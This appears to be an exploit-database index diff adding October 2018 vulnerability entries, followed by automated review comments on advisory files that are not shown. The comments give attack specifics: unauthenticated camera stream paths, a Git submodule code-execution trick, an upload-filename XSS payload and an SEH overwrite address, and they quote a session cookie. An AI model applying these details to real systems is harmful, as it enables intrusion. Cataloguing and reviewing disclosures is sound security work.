@@ -16873,6 +16875,7 @@ id,file,description,date,author,type,platform,port 45561,exploits/php/remote/45561.rb,"Navigate CMS - Unauthenticated Remote Code Execution (Metasploit)",2018-10-08,Metasploit,remote,php, 45574,exploits/windows/remote/45574.rb,"Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit)",2018-10-09,Metasploit,remote,windows,502 45611,exploits/windows/remote/45611.c,"NoMachine < 5.3.27 - Remote Code Execution",2018-10-15,hyp3rlinx,remote,windows, +45629,exploits/hardware/remote/45629.txt,"FLIR AX8 Thermal Camera 1.32.16 - Hard-Coded Credentials",2018-10-17,LiquidWorm,remote,hardware, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, 
@@ -40143,3 +40146,7 @@ id,file,description,date,author,type,platform,port 45621,exploits/php/webapps/45621.txt,"MV Video Sharing Software 1.2 - 'searchname' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php, 45622,exploits/php/webapps/45622.txt,"GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php, 45623,exploits/hardware/webapps/45623.sh,"Heatmiser Wifi Thermostat 1.7 - Credential Disclosure",2018-10-16,d0wnp0ur,webapps,hardware, +45628,exploits/php/webapps/45628.txt,"BigTree CMS 4.2.23 - Cross-Site Scripting",2018-10-17,"Ismail Tasdelen",webapps,php, +45630,exploits/php/webapps/45630.txt,"Time and Expense Management System 3.0 - Cross-Site Request Forgery (Add Admin)",2018-10-17,"Ihsan Sencan",webapps,php, +45632,exploits/hardware/webapps/45632.txt,"TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure",2018-10-17,LiquidWorm,webapps,hardware, +45633,exploits/php/webapps/45633.txt,"Time and Expense Management System 3.0 - 'table' SQL Injection",2018-10-17,"Ihsan Sencan",webapps,php,
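Review bot: in the 45629.txt hunk the description sentence "The devices utilizes hard-coded and credentials within its Linux distribution image" is garbled; suggest "The device uses hard-coded credentials within its Linux distribution image". The header lists two affected firmware versions (1.32.16 and 1.17.13) while the title and the CSV row name only 1.32.16, it lacks the "# CVE: N/A" line the other advisories in this commit carry, and its "Date: 2018-10-14" differs from the CSV row's 2018-10-17. The "service:???" and "developer:???" lines would be clearer as a sentence stating that those web accounts exist but their passwords are not known, so a reader does not take "???" for a literal credential.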
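Review bot: the description in the 45632.txt hunk names only the RTSP stream, but the PoC section also lists an HTTP snapshot path (http://TARGET/jpg/image.jpg); the description should say whether that JPEG endpoint is likewise reachable without authentication, since it is a separate exposure from rtsp://TARGET:554/video.3gp. The header gives "Affected version: 1.6.18P12_121101" while the title says 1.6.18; keeping the full build string in the title helps an operator match it against the firmware actually deployed.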
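Review bot: the second C excerpt in the 45631.md hunk ends the line `ret->smart_options->receivepack = "git-receive-pack";1` with a stray "1" that looks like a typo rather than part of transport.c and should be dropped. The surrounding prose has two broken sentences ("The colon is due to the fact, that the colon character let us go past those lines" and "Due to `url_is_local_not_ssh` will return false due to the colon in the path. And therefore ...") and a fragment ("As the actual URL from `.gitmodules` is interpreted as the `-u` argument."); suggest joining them into one explanation: because of the colon, url_is_local_not_ssh() returns false, the bundle branch is skipped, the URL falls through to the external-handler branch, and smart_options (including uploadpack) remain set. Naming the fixed Git versions next to the CVE would also let readers check quickly whether they are patched.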
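Review bot: the 45628.txt hunk has typos in its header ("Vulernability Type", "Vulenrability"), and the PoC request stops after "Content-Type: image/jpeg" with no file body, closing boundary or server response, so the stored XSS is asserted but never shown; the declared Content-Length of 1574699 also does not match the visible body. The Cookie header still carries a live-looking session id and a personal e-mail address (bigtree_admin[email]=test%40ismailtasdelen.me); those belong scrubbed to placeholders like the TARGET host. The description should also state plainly that the injection point is the upload filename (filename="\">.jpg") and that the request appears to need an authenticated admin session (it carries bigtree_admin[login] and a __csrf_token field), and the CSV row's date 2018-10-17 differs from the file's "Date: 2018-10-15".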
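Review bot: the 45630.txt hunk is titled "Cross-Site Request Forgery (Add Admin)", but what it shows is an authenticated POST (Cookie: PHPSESSID=3i34gub8ub4dk3jhjthinlv922) that edits uid=1 via action=EditUser, and the one-line description "Normal member has all rights" describes a missing authorization check rather than CSRF. To support the CSRF title the PoC would need a cross-origin form or page that submits the request from a victim's browser plus evidence that no anti-CSRF token is checked; otherwise the entry should be reclassified as broken access control / privilege escalation. The trailing `users` table dump adds nothing to the proof and leaks a password hash and an editor name ('changeby' => 'efe') from the test instance.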
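Review bot: the 45633.txt hunk documents three injection points (the table and field parameters of GetTips.php and the POST action parameter of UpdateBORequest.php) while the title and CSV description name only 'table'; either list all three in the description or generalise the title. The quoted GetTips.class.php excerpt also reads userentry and addl_cond straight from $_GET, so the entry should say whether those were tested. PoC 3 reuses the PHPSESSID from 45630.txt, which suggests it needs an authenticated session; the authentication requirement of each PoC should be stated. Finally, each request is followed only by response headers, so whatever the server returned is not visible, and the PoC 3 header lines ("UpdateBORequest.php[SQL]" / "POST /action=[SQL]") are confusingly formatted.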
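Review bot: the EDB Note added to 42031.py links the shellcode under "exploit-database-bin-sploits", whereas the note added to 42315.py in this same commit and the mirror link in 45631.md use "exploitdb-bin-sploits"; one of the two repository names is likely wrong, so all of these links should be checked and made consistent. The note also lists both x64 and x86 shellcode while the file's own "Tested on" block still lists only x64 systems; if x86 was verified, "Tested on" should say so.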
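Review bot: the EDB Note in the 42315.py hunk says "mysmb.py can be found here" but points at a file named 42315.py; a reader will not know to save that download as mysmb.py next to the exploit so the script can find it. Suggest the note say so explicitly, and use the same repository name as the notes in 42030.py and 42031.py.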
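Review bot: the EDB Note in the 42030.py hunk lists an x86 shellcode link directly under the existing line "The exploit support only x64 target"; either the x86 link is irrelevant to this file and should be dropped, or that statement needs updating. The same repository-name inconsistency applies here as in 42031.py ("exploit-database-bin-sploits" versus "exploitdb-bin-sploits" in 42315.py).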
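Review bot: in the 45627.py hunk the "#!/usr/bin/python" line sits after the comment header rather than on line 1, so it has no effect; it should move to the top, since the file is created with mode 100755 and is evidently meant to be run directly. The script is Python 2 only (print statements, str-based payload), which the header should say, and the bare "except:" with a fixed message hides the actual error; "except IOError as e:" printing the exception would be more useful. The SEH overwrite address 0x72d12f35 (pop ebx / pop ebp / ret 0x0c from msacm32.drv) is tied to the tested Windows XP Professional SP3 (ENG) build, and the header should state that dependency explicitly rather than leave it implied by "Tested on".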